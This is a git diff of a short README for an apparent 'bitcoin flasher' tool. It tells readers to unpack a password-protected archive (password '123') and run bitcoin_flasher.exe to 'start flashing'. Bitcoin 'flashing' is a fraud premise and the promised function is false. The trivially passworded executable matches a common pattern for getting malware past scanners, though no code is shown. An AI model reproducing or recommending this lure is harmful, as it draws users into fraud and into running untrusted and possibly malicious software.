Eyopseope/Bitcoin-transaction/README.md

 #How to use

+1. The password for the archive is - 123

-Open bitcoin_flasher.exe and start flashing!
+2. Open bitcoin_flasher.exe and start flashing!

 ![Image alt](https://github.com/Eyopseope/Bitcoin-transaction/blob/main/flash1.png)